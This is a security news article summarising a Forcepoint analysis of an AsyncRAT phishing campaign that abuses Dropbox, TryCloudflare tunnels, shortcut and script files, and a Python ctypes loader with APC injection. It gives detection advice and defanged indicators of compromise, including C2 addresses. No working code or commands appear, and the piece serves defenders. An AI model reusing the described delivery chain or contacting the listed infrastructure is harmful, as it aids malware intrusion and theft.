AsyncRAT Campaign Uses TryCloudflare Tunnels and Python Loaders to Deliver Malware


An AsyncRAT malware campaign is using invoice-themed phishing emails, Dropbox downloads, TryCloudflare tunnels, shortcut files, PowerShell, JavaScript, batch scripts, and Python loaders to infect Windows systems. The goal is to install remote access malware while hiding the attack behind trusted cloud services and a fake invoice PDF.

The campaign does not rely on a single suspicious malware host. It moves through several stages, starting with a Dropbox-hosted ZIP file and then switching to temporary TryCloudflare infrastructure for additional payloads. This gives attackers disposable infrastructure that can be created and abandoned quickly.

A Forcepoint X-Labs analysis found that the infection chain ultimately uses a Python script named load.py and five binary files to inject malware into legitimate Windows processes. The final payloads include AsyncRAT, while some branches also deliver VenomRAT and XWorm.

How the AsyncRAT Campaign Starts

The attack begins with a phishing email that looks like an invoice notice. In the sample analyzed by researchers, a German-language button labeled โ€œRechnung herunterladen,โ€ meaning โ€œdownload invoice,โ€ hid a Dropbox link that delivered the first ZIP archive.

Inside the ZIP file, attackers placed an internet shortcut file. When opened, that shortcut connected to a TryCloudflare-hosted WebDAV location and retrieved an LNK file, which then launched PowerShell to pull a JavaScript file from the same tunnel.

Cloudflare says TryCloudflare quick tunnels let developers test Cloudflare Tunnel without adding a site to Cloudflare DNS. Attackers abuse that convenience because a random trycloudflare.com subdomain can look less suspicious than an unknown standalone domain.

Attack Chain at a Glance

StageFile or servicePurpose
1. Phishing lureInvoice emailTricks the user into clicking a download button.
2. Initial downloadDropbox ZIP fileDelivers the first archive with an internet shortcut.
3. Redirection.URL fileConnects to a TryCloudflare WebDAV path.
4. ExecutionLNK and PowerShellDownloads a JavaScript file from the same tunnel.
5. DropperJavaScript and BAT fileDownloads the Python package and opens a decoy PDF.
6. Loaderload.py and BIN filesInjects RAT payloads into legitimate Windows processes.

The JavaScript stage retrieves an obfuscated batch file. That batch file carries out the main setup work by opening a fake invoice PDF for distraction, downloading a second ZIP archive, extracting it, checking whether Python is available, and running the Python loader.

The campaignโ€™s use of a visible PDF matters because it reduces suspicion. The victim sees a document open after clicking the invoice link, while the real infection chain continues in the background.

Python Loader Runs the Final Payload

The second ZIP file contains many files that look like ordinary Python setup components. Forcepoint found that only load.py and five BIN files were malicious, which helps bury the important payloads inside a larger folder structure.

The loader uses Python ctypes, a standard library module that can call functions from DLLs and shared libraries. In this case, the script uses Windows API calls for memory allocation, memory copying, thread creation, and execution control.

The malware then uses APC injection to run shellcode inside other processes. Forcepoint described this as Early Bird APC Queue injection because the code gets placed into a new process before the main thread begins normal execution.

Payloads Include AsyncRAT, VenomRAT and XWorm

Different BIN files lead to different malware payloads. One file injects VenomRAT into notepad.exe, another injects XWorm, and the remaining files inject AsyncRAT shellcode into explorer.exe.

AsyncRAT gives attackers remote control over infected devices and can support spying, command execution, credential theft, and data collection. VenomRAT and XWorm offer similar remote access and information theft capabilities, which makes the campaign useful for broader cybercrime activity.

AsyncRAT attack chain (Source – Forcepoint)

The payloads communicate with the same command-and-control infrastructure over different ports, including traffic to 62.60.190[.]141 on ports 3232 and 4056. A second server, 62.60.190[.]196, also appeared in the published indicators.

Why TryCloudflare Abuse Keeps Appearing

This campaign fits a broader trend of attackers abusing trusted tunneling and cloud services. Proofpoint research previously tracked financially motivated campaigns that abused Cloudflare Tunnels to deliver remote access trojans, including XWorm, AsyncRAT, VenomRAT, GuLoader, and Remcos.

A related Trend Micro MDR report in January 2026 also described AsyncRAT activity that used Cloudflare free-tier infrastructure, Dropbox links, legitimate Python environments, and decoy PDF files to reduce detection.

Attackers benefit from this model because many defenders cannot simply block trusted services for every user. Instead, they need to inspect behavior, file types, command lines, and unusual connections that follow a click.

What Defenders Should Watch For

  • Invoice-themed emails that link to Dropbox archives or other file-sharing services.
  • ZIP files that contain .URL, .LNK, .JS, .BAT, .WSH, or double-extension files.
  • PowerShell launched by shortcut files, script files, or Microsoft Office processes.
  • Connections to random trycloudflare.com subdomains after an email click.
  • Python folders dropped into temporary or user-writable directories.
  • Explorer.exe or notepad.exe launching suspicious network traffic after script execution.

The Forcepoint report says customer protections covered several stages of the chain, including lure attachments, redirect URLs, dropper files, and call-home traffic. It also noted that Forcepoint NGFW can terminate LNK file transfers and suspicious PowerShell user-agent connections when inspection is enabled.

Defenders should combine gateway controls with endpoint logging. PowerShell logging, script block logging, command-line auditing, and detection for shortcut-file execution can reveal activity before the RAT finishes installation.

Indicators of Compromise

The following indicators came from the public analysis and should support threat hunting. Teams should use them with behavior-based detections because tunnel domains and payload locations can change quickly.

TypeIndicatorDescription
Hostinventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/TryCloudflare location used to host the LNK stage
Hostmercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zipTryCloudflare location used to deliver the Python package
Hostsufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zipAlternate TryCloudflare location for the Python package
C2 IP62.60.190[.]141Command-and-control server contacted over ports 3232 and 4056
C2 IP62.60.190[.]196Secondary command-and-control server
File hash4747ee49bdf31351c025049d8c3b7fef831be77cload.py Python loader
File hash0aa1b8fba8d7bd19a0064edfdf86c027da253644LNK file that triggers the PowerShell stage
File hashcd61de9e4003ba568ae76f064935addb106a6d6dObfuscated batch file that downloads the Python package

How to Reduce Exposure

Organizations should block or detonate shortcut files and script files delivered through email or downloaded archives. They should also apply stricter inspection to file-sharing links when a message uses invoice, payment, purchase order, or delivery themes.

Fake PDF file used for distraction (Source – Forcepoint)

The Proofpoint findings show that many related campaigns use internet shortcut files, WebDAV, LNK or VBS files, BAT or CMD scripts, and Python installers. Blocking one stage may not stop every variant, so layered detection matters.

The Trend Micro analysis also shows why defenders should review Dropbox downloads, TryCloudflare connections, startup persistence, and script-driven Python execution together instead of treating each event as isolated.

Actual malicious files (Source – Forcepoint)

Bottom Line

The campaign shows how attackers can turn everyday cloud and developer services into malware delivery infrastructure. Dropbox hosts the first archive, TryCloudflare serves later stages, Python runs the loader, and legitimate Windows processes hide the final payload.

For security teams, the most important signal is not just the domain name. The suspicious pattern comes from the chain of events: an invoice email, a compressed archive, a shortcut file, a script interpreter, PowerShell, a Python loader, and injected code.

The Cloudflare TryCloudflare documentation explains the legitimate purpose of quick tunnels, while the Python ctypes documentation and MITRE ATT&CK mapping help explain why the loader can interact with low-level Windows functions and inject code into other processes.

FAQ

What is the AsyncRAT TryCloudflare campaign?

It is a malware campaign that uses invoice phishing emails, Dropbox downloads, TryCloudflare tunnels, script files, and Python loaders to deliver AsyncRAT and other remote access trojans.

How does the AsyncRAT infection start?

The attack starts with a phishing email that links to a Dropbox ZIP file. The ZIP contains an internet shortcut that connects to TryCloudflare infrastructure and starts the next malware stages.

Why do attackers use TryCloudflare tunnels?

Attackers use TryCloudflare tunnels because they provide temporary cloud-hosted subdomains that can appear more trustworthy than unknown malware servers and can be rotated quickly.

What does the Python loader do?

The Python loader runs load.py and processes several BIN files. It uses Windows API calls to place shellcode into legitimate processes such as explorer.exe and notepad.exe.

How can organizations detect this campaign?

Organizations should monitor invoice-themed phishing, ZIP files with shortcut or script files, PowerShell launched from LNK files, random trycloudflare.com connections, suspicious Python execution, and unusual network traffic from explorer.exe or notepad.exe.

Readers help support VPNCentral. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more

User forum

0 messages